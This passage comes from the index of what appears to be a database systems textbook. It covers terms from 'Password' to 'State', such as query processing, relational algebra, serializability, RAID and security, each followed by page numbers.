Password, 283, 458, 460, 466-467, 473, 477-478,

501-502, 857, 859, 864, 919
Passwords, 17, 838, 840, 872
Path, 29, 34, 48, 50, 403-404, 406, 410, 413-414,

437-439, 481, 493, 499, 610, 691-693, 727,
800, 802-803, 915, 917, 956-957

Path expression, 404, 410, 438-439
paths, 10, 29, 32, 41, 51, 105, 204, 257, 316, 329,

332-333, 339, 607, 636, 690, 692, 694, 706,
719, 724, 726, 735-736, 915, 950, 1025,
1028, 1047

Pattern, 100, 437-438, 537, 625, 956, 962, 964, 1000,
1007, 1024-1027

Pattern recognition, 962
patterns, 23, 333, 437, 739, 865, 913, 1008-1009,

1018, 1024-1027, 1033, 1047
PEAR, 491, 500-505
Peers, 915, 1028
Perfect, 842, 1014
performance, 15-16, 18, 20, 22, 34-35, 38, 41,

312-317, 331-334, 350, 352, 588-590, 592,
595, 618-619, 622-629, 635, 674-675,
689-690, 723, 733-736, 739-742, 744-746,
776, 781, 798, 805-808, 834, 838, 859, 882,
897, 902, 908-909, 913-914, 929, 961, 1014,
1026, 1028, 1034-1035, 1037, 1042,
1045-1046

Peripherals, 627
Perl, 424
Permutation, 864
Persistence, 352, 361, 365, 367, 381, 412, 414
Persistent storage, 17, 281, 855, 1046
Personal computer, 2, 27, 591
Personal information, 502, 836, 842-843, 895, 995,

1018
Phantom, 767, 775, 803-806
Phase, 7, 41, 201, 204, 313-321, 328-329, 332-334,

348, 351, 353, 400, 688-689, 695, 700-701,
729, 772, 780-781, 785-789, 795, 797-798,
801, 805-808, 819, 822, 824-829, 832,
907-910, 913, 918, 925, 963, 1042

Phone numbers, 57-58, 239, 277, 377, 742, 1010
PHP, 454, 490-506
Physical data model, 32
Physical design, 7, 203-204, 314-315, 317, 330,

332-333, 348, 350-351, 354-355, 733, 736,
745-746

Physical tables, 741
Picture elements, 965
pipelining, 590, 705, 715, 723-724, 726, 729

strategy, 705, 715
Pivoting, 1039
Pixels, 964-966
Plaintext, 864-866
planning, 23, 46, 626, 685, 886, 962
platters, 591
Point, 11, 18, 31, 57-58, 63, 70, 87, 210-211, 227, 265,

318, 350-351, 355, 369-371, 380-382, 388,
392, 403-404, 406, 411, 460, 509, 583, 600,
606, 617, 627, 658, 661, 746, 755-756,
758-759, 811-812, 815-821, 823-824,
826-828, 830, 884-885, 943-944, 947-949,
953-954, 957-959, 977, 988-989, 1020,
1033, 1058

pointer, 49, 362, 462, 472-473, 600, 602-605,
612-614, 616, 618-619, 632, 638-646, 649,
651-663, 665, 668, 671, 673, 677, 703,
802-803, 816, 960

pointers, 22, 332, 603, 614, 616, 619, 622, 634,
636-637, 644-646, 648, 652-662, 665-666,
671, 673, 677-678, 692, 718-719, 725, 804,
960-961, 996, 1028, 1040

point-to-point connections, 627
polygon, 372, 956-957

area, 372, 956-957
polymorphism, 361, 371, 373, 402-403, 414, 416
Port, 302
Position, 9-10, 50, 58, 88, 256-257, 267, 281, 299,

310, 384, 387-388, 409, 416, 418, 440, 462,
464, 469, 479, 587, 601-602, 607, 610,
612-614, 640, 661-662, 713, 826, 956-957,
959, 968-969, 991, 1012-1013, 1015-1016,
1030, 1054

power, 42-43, 92, 102, 115, 164, 177, 189, 212, 216,
365, 481-482, 527, 590, 614, 978,
1034-1035

Precedence, 767-769, 771, 778
Precedence graph, 767-769, 771
Precision, 87-88, 354, 382, 742, 842, 872, 1009, 1011,

1014-1016, 1018, 1029-1030
Predicate, 55, 62, 150, 179, 187, 189, 253-255, 259,

262, 265-266, 274, 672, 744, 804, 806-807,
870, 961, 964, 966, 968-971, 974, 976,
978-981, 986-987

Predicates, 185, 869, 923, 956-957, 959, 961,
968-974, 976-981, 984, 987, 989

Prediction, 957, 961
preferences, 342, 1018, 1023-1024

Documents, 1018, 1023-1024
Measuring, 1018
Search, 1018, 1023-1024

Prefixes, 456, 595, 1009
preprocessor, 459, 468, 471, 491-492
prerequisites, 4, 7, 11-12, 342, 941
presentation layer, 46, 892
Pretty good privacy, 855
Primary index, 610, 637-641, 644-645, 647-651, 675,

677-678, 691, 718, 721-722, 736-737, 741
Primary key, 65-66, 69-70, 72, 74, 76, 80, 86, 89-91,

105, 137, 145-146, 160, 211, 289-297, 300,
354, 400, 435, 515, 519-520, 523-524,
526-533, 538, 543, 545, 547, 638-641,
649-650, 676, 692, 735, 895-896, 947

Primary keys, 66, 69, 80, 289-293, 435, 523-524, 530,
532, 544, 550, 552, 896-897

Prime number, 614
Prime numbers, 866
Primitive, 271, 322, 1024
Primitives, 1022-1023
Print server, 43
Printers, 42-43
Printing, 11, 20, 44, 457, 492, 495-496, 818, 831, 997
Printing press, 997
Priorities, 313, 318, 735, 770, 791
privacy, 80, 836-837, 842-843, 854-855, 860, 863,

867-868, 872-874, 876
audit, 873
medical, 837, 867
right to, 837

privacy issues, 867, 873
private, 278, 379, 628, 837, 855, 865-866, 869-871,

873
Private key, 865-866, 873
Private keys, 865
Privilege, 84, 106, 378, 840, 843-848, 854, 856, 859,

873, 875
Privileges, 106, 836, 838-840, 843-848, 852, 854,

870-875, 883
least, 848

Probing, 695, 700-702, 723
Procedure, 132-133, 137, 288, 299, 325, 370, 441,

481-482, 509-510, 528, 532, 543, 550-551,
561, 573, 581-582, 607, 621, 678, 810, 819,
824-825, 918, 935, 955, 973, 984

Procedures, 19, 23, 28, 46, 48, 62, 119, 287, 319, 344,
400, 480-482, 485, 516, 581-583, 628, 656,

665, 812, 854-855, 859, 870, 893, 916, 918,
934, 955

Process, 3, 5, 11, 17, 30, 35-36, 45, 50, 64, 93, 130,
160, 202, 226, 234, 236, 244, 251, 258-259,
268-270, 301, 309, 313-318, 321-323,
327-329, 340-341, 347-349, 351-353, 355,
426, 428, 476, 483, 523-525, 532, 538, 581,
597-599, 605, 622, 624, 630, 674, 724,
748-749, 761-763, 768, 812-813, 817-818,
830, 832-833, 849, 863-864, 909-912, 914,
916, 922, 973-974, 998-999, 1001-1002,
1005-1006, 1008-1013, 1023-1025,
1028-1029, 1048-1049

states, 205, 340-341, 581, 761, 781, 863-864
Processes, 1, 3, 33, 35, 38, 40, 46, 251-252, 258-259,

274, 313, 328-329, 336, 598, 654, 739-740,
745, 748-749, 769-770, 819, 862, 893, 901,
909, 916, 918, 999

suspended, 740, 749
processing, 1, 7-9, 11-15, 17-18, 20-22, 24-26, 33,

37-38, 40, 42-45, 48, 75, 78, 82-84, 106,
130, 153, 310-312, 314-316, 319, 328, 336,
341, 428, 436, 456-457, 462-463, 484,
494-496, 546, 589, 592, 623, 627, 684-730,
732, 735-737, 747-779, 794, 832, 835,
886-887, 891-893, 901-902, 911, 913, 918,
920-921, 924-926, 979, 981-982, 988-989,
994, 999-1000, 1011-1012, 1018, 1032,
1034-1035, 1044-1046, 1048-1049

processors, 20, 428, 430, 749, 882
Product operation, 97, 124, 158, 160, 189, 702, 711,

714
Production, 23, 244, 311, 930
program, 1, 4, 8-11, 14, 17, 19, 21, 25, 31, 34-35,

40-42, 203, 236, 256-257, 267, 299, 340,
367, 371, 382, 402, 411, 413, 418, 421, 428,
454-481, 483-485, 490-493, 495, 505-506,
545, 590-591, 604-605, 607, 611, 613-614,
632, 634, 774, 861-863, 892, 968, 971, 977,
986, 991, 1021

Program code, 19, 333, 402, 456, 461, 465, 481, 484,
491, 634

Program modules, 455, 480-481
Programmer, 17, 130, 329, 359, 389, 392, 411-412,

455, 458-460, 462-464, 466-467, 472,
479-480, 484, 499-500, 502, 733, 750, 789,
863

Programming, 7, 14, 17-18, 21-22, 35-36, 38, 45-46,
49, 51, 56, 62, 105, 119, 211, 249, 265,
329-331, 334, 358-360, 362-363, 365-367,
371, 394, 402, 411, 416, 428, 454-489,
490-506, 600, 719, 869-870, 924, 968, 975,
989

bugs, 754
object-oriented, 17, 22, 45, 249, 265, 330-331, 334,

358-360, 367, 371, 380, 411, 416, 459,
466, 471, 476, 989

Programming errors, 754
Programming language, 17-18, 21, 35-36, 40, 45, 49,

51, 83, 93, 105, 334, 358-360, 365-367, 373,
394, 411, 440-441, 454-459, 466, 468, 471,
480-481, 484-485, 495, 500, 505, 870, 975

Programs, 3-5, 7-11, 14, 19-21, 24, 27, 31, 33-34,
38-46, 64, 70-71, 203-204, 313-314, 317,
333, 371, 425-426, 441, 454-456, 459, 461,
464, 466-467, 476, 481, 484, 491, 493, 584,
590, 599, 601-604, 607, 748-749, 759, 851,
968, 971, 975-976, 998, 1027, 1045-1046

context of, 590, 892
project management, 1047
Project operation, 97, 152-155, 175, 687, 701, 705,

714-715, 979
Projection, 93, 95, 153, 155, 168-169, 189, 560, 564,

568-569, 675, 696, 708, 711-712, 714-715,
724, 726, 924

Prolog, 62, 549, 585, 968-970, 973, 975, 977, 979,
982, 984, 989

Properties, 2, 10, 12, 48, 65, 204-205, 229, 246, 252,
268-269, 348, 361, 386, 390, 392, 395, 399,
401, 412-414, 427, 478, 509-510, 524-525,
540, 558, 564, 567-569, 573-575, 582-583,
747-748, 758-759, 763, 776-777, 805,
855-856, 866, 958-960, 965, 983, 999-1000,
1014, 1018-1020, 1026-1027

of algorithms, 510
Property, 9, 12, 29, 36, 64-65, 163, 211, 361, 390, 399,

520-522, 525, 533-534, 536, 538, 541-542,
551, 556, 558-569, 573-574, 577, 582-586,
619, 700, 759, 765, 768, 780, 830, 849, 868,

873, 876
Get, 36, 538, 558, 560-561, 566, 765
Set, 29, 36, 64-65, 211, 390, 521, 525, 538,

541-542, 551, 556, 558-562, 564-569,
573-574, 577, 582-586, 780

Property rights, 868, 873, 876
Protocol, 441, 499, 627-629, 772, 780, 785-789, 791,

793, 797-801, 803-807, 811, 813-816, 822,
828-833, 855, 858, 892, 907-911, 913, 916,
919, 921-922

LAN, 628
SSL, 855, 919

protocols, 56, 440-441, 756-757, 759, 767, 771-772,
776, 780-781, 788, 790, 794, 804-807, 810,
831, 855, 916-917, 920, 925

prototyping, 15, 333
Pruning, 723
Pseudocode, 634
Public domain, 311
Public key encryption, 839, 864-866
publications, 416, 863
Publishing, 22, 193, 436

Q
Queries, 4-5, 7-8, 11, 13, 16-17, 21, 23, 26, 35, 37-39,

46, 66, 83, 96-99, 101-102, 105-109,
115-147, 148-149, 154, 166, 168-169,
171-172, 174, 177-178, 181-183, 185,
187-197, 201, 204, 333-334, 353, 400,
402-404, 406-409, 413-415, 448, 455-459,
464-465, 468, 503-504, 506, 666-667, 670,
674-675, 684-687, 691, 715-716, 723,
727-730, 733-740, 742-746, 857, 868,
881-883, 886, 889-890, 892-894, 922, 953,
955-956, 959, 969, 978-980, 982-984, 989,
994, 996-997, 1000-1001, 1006-1008,
1013-1014, 1029-1030, 1039, 1041-1042,
1045-1046

Query, 4, 7, 13-14, 17-18, 21-23, 34, 36-40, 45-46, 48,
50-51, 55, 71, 82-83, 93, 95-104, 107,
117-126, 128-132, 134-137, 141-142,
152-153, 160, 162, 165-169, 174-179,
181-190, 194-195, 198, 245, 329, 348, 359,
365, 402-410, 413, 416, 421, 425, 437,
439-440, 447, 456-457, 461-465, 468-475,
478-480, 482-484, 500-505, 622, 665, 667,
669-670, 672, 684-730, 732, 734-736,
739-740, 742-745, 842-845, 854, 877-879,
881-883, 886, 889-894, 901-907, 915,
918-925, 952-954, 958-959, 963-965, 971,
973-974, 979-982, 985-989, 993-994,
996-1017, 1019-1020, 1022, 1024, 1029,
1031-1032, 1044-1046, 1058-1065

Query:, 118, 129, 152-153, 194, 528, 665, 703, 706,
727, 742, 893, 903, 979, 987

Query compiler, 39, 889-890
Query execution, 18, 166, 183, 685-686, 705-706,

708, 714, 716-717, 728-730, 902, 905
Query language, 7, 13-14, 23, 36, 48, 51, 55, 83,

148-149, 166, 177, 190, 198, 245, 359, 365,
380-381, 402, 413, 437, 684-686, 843, 954,
988, 1006, 1026, 1032

Query optimization, 39, 45, 130, 183, 348, 684-686,
692, 705, 711, 715-716, 724, 726-730, 739,
901-902, 918, 920, 979, 982, 997

Query processing, 17-18, 22, 55, 61, 589, 684-730,
732, 735, 878-879, 891, 901-902, 904, 920,
924-925, 979, 981, 988-989, 996, 999-1000,
1045-1046

Queue, 782-783, 788, 791
priority, 791

Queuing, 624-625, 918
Quick sort, 688
quotation mark, 425
quotation marks, 87, 100

R
Race conditions, 909
RAID, 588, 598, 622-628, 630-631, 635
RAM (random access memory), 590
Range, 14, 88, 150, 178-179, 181, 186-187, 189-190,

211, 348, 350, 352, 403, 405, 424, 439, 611,
630, 666-668, 691, 734, 736-737, 744, 861,
897, 959, 967, 1013, 1018, 1020, 1046,
1054

Range query, 667, 959
READ, 4, 17, 38, 40, 75, 109, 224, 338, 351, 378, 381,

464, 485, 590-591, 593, 595-598, 603, 605,

607-608, 610, 624-625, 629-630, 634,
660-661, 674, 676, 679, 688-690, 698,
700-701, 739, 748-757, 760-764, 766-768,
772-775, 777, 781-789, 792-805, 813-818,
820-822, 828, 831-832, 835, 838, 844, 862,
864, 870, 913, 918, 969-970, 992,
1046-1047, 1054-1056

Read operation, 772, 802, 913
Read uncommitted, 774-775
reading, 11, 75, 598-599, 603-605, 610, 626, 634, 689,

716, 726, 749, 754, 783, 794, 796, 940,
1055

read/write heads, 596
Receiver, 861, 864-866
Record, 4-5, 9-10, 16-19, 21-22, 29-31, 33, 36, 49-50,

56, 75, 80, 109, 132-133, 220, 244, 248,
256, 278, 282-283, 312, 317, 333, 362, 378,
380, 461-463, 472-473, 480, 500-503, 545,
598-617, 619-622, 629-630, 632-634,
636-638, 640-642, 644-646, 648-649,
656-661, 670-671, 673-674, 676-678, 682,
690-695, 698-703, 717-722, 737, 756-758,
782-783, 798-801, 840-841, 911, 940, 947,
950-951, 960, 1006-1007, 1022

recording, 594, 756, 812, 830
Recoverable schedule, 762
Recovery, 14, 18, 20, 24, 39-40, 45, 106, 329, 331,

360, 624, 740, 747-748, 750-751, 754-763,
776, 779, 785, 794, 807-808, 810-835, 840,
868-869, 878, 883, 893, 907-912, 921-922,
925

Recovery manager, 750, 755, 815, 826, 828-829, 881,
907-908

recursion, 171, 968, 980, 989
Redundant disk, 624
Reference, 10, 33, 69, 73, 85, 105, 119, 134, 136,

138-140, 216, 226, 276-277, 291-294, 355,
364, 366-367, 370, 374, 377, 391, 398-399,
401, 404, 406-407, 409, 422, 459, 779, 966,
989

References, 69-70, 76, 85-86, 90, 97, 105, 109,
119-120, 143, 145-146, 160, 178, 214, 270,
292-294, 364, 367-368, 390-391, 399-402,
405, 411, 413, 416, 422, 430, 635, 675, 721,
839, 842, 845, 876, 912, 915, 919, 960,
988-989, 1024, 1062

Reflection, 3
Register, 11, 337-338, 341-342, 396-397, 476, 865
regression, 1046
regular expressions, 1007, 1011
Relation, 9, 55-67, 69-77, 80, 84-85, 89-90, 92-93,

95-97, 102-106, 118-120, 126, 128, 137-139,
148-150, 152-156, 158, 160-167, 169-174,
176, 178-179, 181-182, 184-187, 190,
193-195, 234, 269-270, 289-301, 354, 361,
400, 508-511, 513-548, 550-555, 558-562,
564-570, 572-579, 581-586, 668-671, 676,
684, 687, 693, 701-706, 708, 711-715, 720,
722-726, 738, 843-851, 873-875, 880-881,
894-896, 898-900, 902-904, 921, 923, 925,
945-948, 950, 961, 968-969, 979-980, 983,
985-986, 993, 1019, 1060-1065

Relation schema, 58, 60, 62-65, 69, 75-76, 297, 508,
510-511, 521-528, 530-531, 533, 535-538,
540-546, 551-552, 559-562, 565-568,
573-575, 577-579, 581-582, 584, 849, 860

Relational algebra, 55, 71, 75, 81, 82-83, 92-93, 97,
99, 148-200, 296, 301, 416, 686-687, 690,
704-708, 711, 714, 728, 730, 895, 902-904,
978-979, 987, 989, 996

Relational calculus, 55, 72, 83, 148-200, 301, 506,
706, 708, 968, 971-972, 1058-1059

Relational database, 19, 22, 35, 37, 44, 55-81, 82-85,
107-111, 114, 143-144, 148-149, 160,
191-194, 197, 199-200, 204, 287-308, 309,
353, 368, 381, 399, 412, 415, 417, 421,
435-436, 448-450, 452-453, 485-486, 489,
503, 508-512, 520-521, 524, 528, 537-538,
542, 545, 550-587, 676, 690, 731-732, 824,
835, 874, 927-928, 968-969, 976, 979, 981,
988, 990, 994, 1065

Relational database model, 204, 849
Relational database schema, 37, 56, 66-68, 70-72,

76-78, 84-85, 107-111, 114, 143-144,
191-192, 199-200, 287-289, 293, 301, 305,
441, 448-450, 452-453, 485-486, 489, 507,
508, 511-512, 520, 545, 558-559, 570,
731-732, 874, 876, 927-928, 990

Relational database system, 83

Relational databases, 11, 21-22, 29, 48, 56, 66, 82,
106, 156, 216, 335, 357-419, 427, 435-436,
447, 457, 508-549, 559-562, 564, 567-568,
573, 577-578, 584-585, 622, 746, 894, 924,
945, 981-982, 989

relational expressions, 109, 191
Relational model, 28, 33, 41, 51, 55-57, 61-64, 67, 71,

75-76, 81, 84, 92, 101, 148-149, 153, 177,
188, 197, 285, 287, 294-296, 347, 352,
360-363, 365, 368, 374, 377, 399-400, 412,
414, 457, 526, 851, 872, 979, 982, 996

Relational operators, 71, 188, 190, 195, 714, 728,
981-982

Relations, 9, 28, 56-57, 59, 61-64, 66-67, 69-76,
78-79, 81, 83-85, 91-92, 95-99, 102,
104-107, 109, 128-130, 133, 135-137,
148-149, 154-158, 160-163, 165-167,
171-174, 178, 181-182, 185, 187-190,
193-194, 197, 287, 289-296, 298, 350,
361-362, 380, 459, 508-510, 513-516,
518-520, 523-534, 537-543, 545-547,
558-562, 564, 566-574, 576-579, 581-584,
586, 622, 668, 674, 676, 694, 700, 705-708,
711-714, 723-725, 843-846, 848, 851, 886,
894-895, 898, 901-903, 905, 920, 923-924,
936, 945-950, 958-959, 968, 976, 978-983,
986, 1060

Relationship, 7, 19, 24, 29, 46, 49, 56, 62, 67-68,
70-71, 81, 86, 91, 110-111, 143-145, 183,
197, 199-200, 201-245, 246-286, 287,
289-295, 301-305, 312, 317, 320-325,
336-337, 346, 349, 356, 387, 390-392,
396-402, 404-407, 409, 412, 414-415, 444,
449-450, 452, 508-509, 513-514, 520, 522,
539, 566, 576-578, 622, 731-732, 795, 872,
915, 927-928, 990, 1016-1017, 1050-1052

Relationship set, 214-216, 218, 223, 230, 234, 236,
391, 396-397

Relationships, 5, 18, 21, 23, 26, 28-30, 32, 50, 62, 69,
160, 202, 204-205, 213-220, 222-223,
228-236, 241, 243, 245, 246-249, 256-257,
259-260, 264, 268-269, 271-274, 276, 285,
287, 291-293, 295, 311-312, 320, 322,
324-325, 330, 335-336, 338, 342, 345-348,
355, 360, 376, 386-387, 390-392, 394-395,
398-403, 406-407, 412-413, 421-422, 446,
540, 543, 577, 621-622, 925, 956-957, 967,
970, 1009-1011, 1026, 1052

release, 244, 787-788, 869-870, 908-909
remote computers, 312
removing, 33, 65, 388, 533, 535, 569, 833, 844, 1065
Renaming, 95, 122-123, 154-155, 162, 169-170, 175,

190, 738, 1065
Repeatable read, 774-775
Replacement policies, 751
Replica, 442, 446, 905
Replication, 48, 575, 878, 880, 883, 889, 894,

896-898, 901, 905, 913, 918-921, 924,
1044-1045

reporting, 7, 173, 313, 387, 1037
REQUIRED, 20-21, 37, 45, 67, 82, 89, 93, 96, 98, 107,

124, 141, 169, 177, 190, 234, 283, 291, 293,
310, 328, 330-331, 361-362, 400, 429-430,
516, 596-598, 608, 629, 638, 666, 677-678,
699, 715, 736, 812-813, 815-816, 872, 882,
904-905, 942, 1054-1056

requirements engineering, 355
resetting, 757
Resilience, 915
response time, 13, 312, 314, 316, 332, 625, 716, 739,

747
RESTRICT, 19, 89, 91, 128, 138-139, 150, 437-438,

652, 813, 913, 977
Result table, 715, 1062
retrieving, 92, 169, 189, 409, 440, 459, 462, 468, 485,

505, 606, 614, 622, 684, 693, 736, 749, 913,
948, 980, 992-993, 995-996, 998

Return type, 468, 481
reverse engineering, 301, 344
Reviews, 202, 244, 838, 989
Revoking privileges, 839, 843, 845, 848, 872, 875
Right child, 723
Risk, 344, 875, 1015
Rivest, Ron, 866
ROLAP, 1046, 1048
Role, 2, 11, 25, 35, 46, 58-59, 67, 69, 171, 190,

214-215, 217, 222, 227-229, 234, 236,
242-244, 248, 250, 259, 337, 355, 435, 836,
852-853, 855-856, 872-873, 875-876, 907,

922, 960, 1031
Role-based access control (RBAC), 852, 872
Roles, 45, 51, 59, 67, 202, 214, 217, 224, 235, 838,

852-853, 872
RBAC, 852-853, 872

Rollback, 756, 762-763, 774-775, 793, 795, 814,
816-818, 820, 830-832, 834-835, 948

Roll-up, 1039-1040, 1045
Root, 166, 257, 266, 370, 428, 434, 437-438, 442-446,

500, 651-652, 655-657, 659-662, 665, 703,
706, 714, 725-726, 800-803, 839, 960

Root node, 166, 437, 651-652, 655-657, 660-662, 665,
706, 802-803, 960

Rotation, 398, 593, 596, 943, 958, 966, 1045, 1054
Rotational delay, 596, 598, 625, 629, 631-632,

1054-1056
Rotational latency, 634
Round, 987
Routers, 42, 628
Routing, 25, 283, 590
Row offset, 726
rows, 52, 60, 85, 117, 125, 152, 189, 377, 463-464,

469, 503-504, 562, 668-672, 674, 725-726,
742, 775, 844, 854, 857, 870-872, 880-881

RSA, 866, 874
R-tree, 960
Rule, 19, 91, 117, 119, 129, 132-133, 179-180, 185,

257, 328, 372, 427, 495, 553-554, 557-558,
575, 581, 712-714, 723, 726, 728, 777,
784-785, 801, 849, 930-932, 934-941,
961-962, 968-974, 976-981, 983-984,
986-988, 1004, 1025, 1061

Rules, 19-20, 46, 63-64, 69, 71, 75, 83, 119, 179-180,
183, 185, 189, 194, 222, 255, 264, 268, 270,
350-351, 414, 430, 459, 497, 551-555,
574-575, 579, 582-583, 586, 653, 684, 686,
705-706, 711-715, 723, 728, 736, 782-783,
785-787, 789-790, 795, 800-801, 859, 862,
872-873, 929-934, 936-941, 968-979,
981-987, 989, 1006-1007, 1025-1026, 1045

Run-length encoding, 675
Runtime errors, 484

S
Safe rule, 984
safety, 178, 963, 976-977, 981-982
sampling, 730, 1020
SAP, 886
SAX, 428
scalability, 628, 914-915, 1045
Scaling, 958, 964, 966
Scanner, 684, 705
Scenarios, 203, 318, 336-337, 355
Scene, 12, 14-15, 25, 966
Schedule, 38, 40, 340, 342-343, 759-773, 776-778,

785-789, 791-792, 794, 801-802, 807, 809,
816, 819, 822, 832, 925

Scheduling, 332, 625, 740
response time, 332, 625

Schema, 27-28, 30-35, 37-38, 49-53, 56, 58-60,
62-72, 75-80, 83-87, 89, 91-92, 105-111,
113-114, 115-147, 167, 190-196, 199-200,
214, 218, 223-224, 226-228, 230, 233,
235-243, 252, 256, 258-259, 261-265,
268-271, 273, 278-280, 286, 287-291,
293-295, 301-303, 305, 319-325, 327-329,
335-336, 344-345, 347-349, 351-353,
355-356, 380, 394-396, 398-399, 401-403,
406-407, 411, 413-415, 419, 421-422,
425-428, 433-437, 440-453, 459, 465,
488-489, 506-507, 508, 510-514, 516,
520-531, 533, 535-538, 540-546, 549,
550-552, 558-562, 564-570, 573-575,
577-579, 581-585, 587, 706, 727, 729,
731-732, 759, 853-854, 860, 874, 884-885,
889-891, 896-897, 905-906, 925-928, 945,
984-985, 990, 994, 996, 1022, 1047-1048

Science, 2, 5-6, 26, 30, 54, 57, 108, 112, 147, 246,
404-409, 487, 996, 998, 1047

Screens, 331
Script, 169, 424, 491, 500
scripting, 454, 490-491, 505
scripts, 1025
scrolling, 1061
search engines, 37, 415, 994-996, 998-999, 1003,

1007-1010, 1017, 1019, 1026-1027,
1029-1030, 1032

Search keys, 668, 676
Search query, 994, 998, 1000

Search tree, 652-654
searching, 23-24, 333, 438, 500, 597, 607-608, 615,

619, 637, 648-649, 651, 668, 673, 675-676,
678, 727, 801, 979, 992-995, 997, 999-1000,
1009, 1017, 1028

Searching the Web, 1017, 1019
Second normal form, 524, 530, 533, 543, 552
Secondary index, 637, 641, 644-647, 649, 673-674,

677-678, 719-722, 727, 741
Secondary memory, 959
Secret key, 864-865
sectors, 594
Security, 4, 13-14, 17, 24, 46-47, 57-58, 67, 79-80,

83-84, 106, 122, 135, 165, 205, 211,
236-237, 241, 279, 330-331, 352, 416,
461-462, 468, 472-473, 513, 517, 544, 565,
613, 665, 836-876, 883, 919, 925, 931, 951,
1027

authenticity, 841-842
availability, 13, 330-331, 837, 841, 868, 871
cryptography, 875
e-commerce and, 855
encryption and, 47, 836, 863-865, 873
failure, 840, 883
network, 46-47, 416, 839, 856-857, 883, 919, 925
threats, 836-838, 856, 863, 868, 871, 875

Security threats, 836
Seek time, 595-596, 598, 608, 629, 631-632, 634,

1054-1056
Segmentation, 964-966, 1026
Segments, 459, 467, 492, 603, 964, 966, 1028
SELECT, 37, 74, 92-93, 95-102, 104, 106, 117-126,

128-131, 133-136, 140, 142, 149-155, 160,
164, 178, 181-183, 188-189, 350, 372, 380,
403-410, 462-463, 468-470, 472, 475,
477-478, 483, 504, 517, 543, 665-666, 672,
686-688, 690-693, 703-706, 708-709,
713-716, 718, 724, 727-729, 742-745, 791,
813, 844-848, 857-859, 923, 933, 942, 957,
978-979, 981, 984, 1063-1064

Selection, 93, 95, 97, 140, 150-152, 158, 160, 164,
167, 181-182, 187, 194, 244, 354, 360,
439-440, 606, 678, 690-693, 698-699, 708,
711-713, 717-722, 724-725, 734-736, 742,
806, 860-861, 905, 924, 952-954, 956, 979,
1026, 1048, 1060

Selections, 520, 736, 954
selector, 431-432, 435
Semantic analysis, 1005
semantic data models, 246-247, 268-269, 271, 285,

356
Semantic Web, 273, 285, 441
Semantics, 19, 81, 130, 143, 232, 319, 411, 428,

510-511, 513, 521-523, 528, 543, 550, 559,
579, 868, 914-915, 925, 935, 937-939, 945,
948, 967-968, 988, 996, 1022

Semaphores, 909
Semijoin, 901, 904, 907, 920, 922, 925
Sensors, 868, 940
Sentinel, 988
Sequence, 82, 85, 133, 151-152, 154, 158, 160, 164,

177, 187-188, 203, 316, 328, 335-339,
341-342, 344, 352, 431-435, 437-440,
443-445, 456-458, 503, 602, 621, 662-664,
704-705, 711, 715, 763-765, 768, 773, 825,
833, 840, 860, 870, 966, 985

Sequence:, 663-664
Sequence numbers, 831, 833
sequence structure, 434
Sequencing, 329
Sequential access, 464, 597, 636, 650
Sequential file, 592, 607-608, 610, 649, 668, 676
Sequential files, 40, 679
Serializability, 748, 755-756, 760, 762-765, 767-774,

776-779, 780-781, 785, 787, 791-792,
794-795, 797, 805-807, 809, 886, 911

Serializable schedule, 766-767, 769, 776-778, 785,
801-802

server, 27-28, 40-48, 51-52, 55, 106, 311-312, 329,
358, 458, 460, 471, 473, 480-481, 491-494,
498-502, 505, 590, 627, 858, 869, 871,
884-885, 887, 892-894, 915-922, 926-927,
955, 1037, 1046

servers, 3, 22, 27, 40, 42-47, 312, 458, 460, 593,
595-596, 627-628, 859, 884, 886, 893, 919,
1027

compatibility, 45
web, 22, 27, 43, 45-46, 312, 628, 859, 1027

services, 40, 44, 46, 48, 311, 331, 627, 856, 862, 866,

882, 914-917, 919, 963, 999, 1017-1018,
1035

classification of, 48
utility, 40

sessions, 852
Set difference, 99, 121, 149, 156, 158, 176, 189,

696-697, 702-703, 705, 728-729, 981
Set intersection, 99, 176
Set theory, 55, 59, 81, 99, 149, 155
Setup, 626
Shamir, Adi, 866
Shared lock, 803
Sibling, 438, 659, 662, 664-665
Signals, 756
Signature, 10, 360, 365-366, 379, 391, 414, 855,

866-867
Simple Object Access Protocol (SOAP), 441
Simplicity, 45, 55, 320, 628, 734, 843, 848
simulation, 15, 333, 614, 656, 665, 912
Singapore, 245, 987
Single inheritance, 252, 257-258
Single precision, 1016
single-line comments, 492
site structure, 1025
slots, 598, 611
SMART, 1032
Snapshot, 31, 918, 945, 950
Snapshots, 918
SOAP, 441
social networking, 1018
Social Security number, 67, 79, 205, 211, 236-237,

262, 279, 461-462, 468, 472-473, 477, 511,
513, 517, 544, 565, 613, 665, 931, 951

Sockets, 855
software, 2-5, 7-9, 11-15, 17-18, 20, 23-26, 27-29, 31,

34, 38, 40-45, 47-48, 51-52, 56, 228, 246,
259, 266, 282, 310-311, 313-314, 329-332,
334-336, 348-349, 352, 355, 413, 436, 456,
501-502, 598, 622, 627, 629, 674, 882-884,
886, 907, 909, 914, 917-918, 920-921, 937,
1023, 1046

malicious, 4
system components, 44

software and, 8, 13-14, 40, 43, 334, 627
software developers, 14, 334
Software engineering, 26, 29, 41, 56, 201, 259, 266,

314, 332, 334-335, 349
Solution, 232, 372, 528, 623-624, 631, 716, 738,

789-791, 804, 855, 879, 904, 962
Sorting, 41, 153, 497, 605, 607-608, 635, 673,

687-689, 694, 699, 702, 704, 716, 722, 730,
734, 745, 768, 1045

sound, 282, 554, 575, 579, 967
speakers, 967

Source, 2, 40-41, 48, 51, 55, 189, 336, 356, 425, 456,
465, 471, 476, 483-484, 490-491, 505,
871-872, 891, 917, 920, 963-965, 1010,
1017, 1020, 1022, 1037, 1043, 1047

source code, 336, 465, 471, 483-484
Source program, 456
Spaces, 129, 601
spam, 1027

filtering, 1027
Spanned blocking, 634
Sparse index, 638, 741
Specifications, 7, 14, 35, 124, 130, 187, 204, 313, 319,

329, 333, 342, 344, 374, 386, 389, 391, 394,
400, 434-435, 441, 595, 917

Speed, 17, 34, 248, 251-253, 297, 306, 588-590, 596,
623, 627, 631, 636, 641, 654, 698, 734, 868,
960

Spindle, 593
Spiral, 594
spreads, 322
spreadsheets, 1046
SQL:, 115-147, 374, 377, 729, 846
Stack, 660-661, 665
stakeholders, 318
Standard deviation, 860
standards, 20, 41, 53, 82-84, 143, 348, 358-359, 437,

440, 455, 774, 854-855, 863-864, 893, 935,
941, 964, 997, 1032

Star schema, 1040-1042, 1048
Starvation, 781, 788, 791, 793, 806-807
State, 7, 18, 30-31, 50-51, 58-60, 62-66, 68-69, 71,

75-76, 78, 80, 92, 94, 109, 111, 114, 174,
190, 193, 195, 199, 209-212, 237-239, 241,
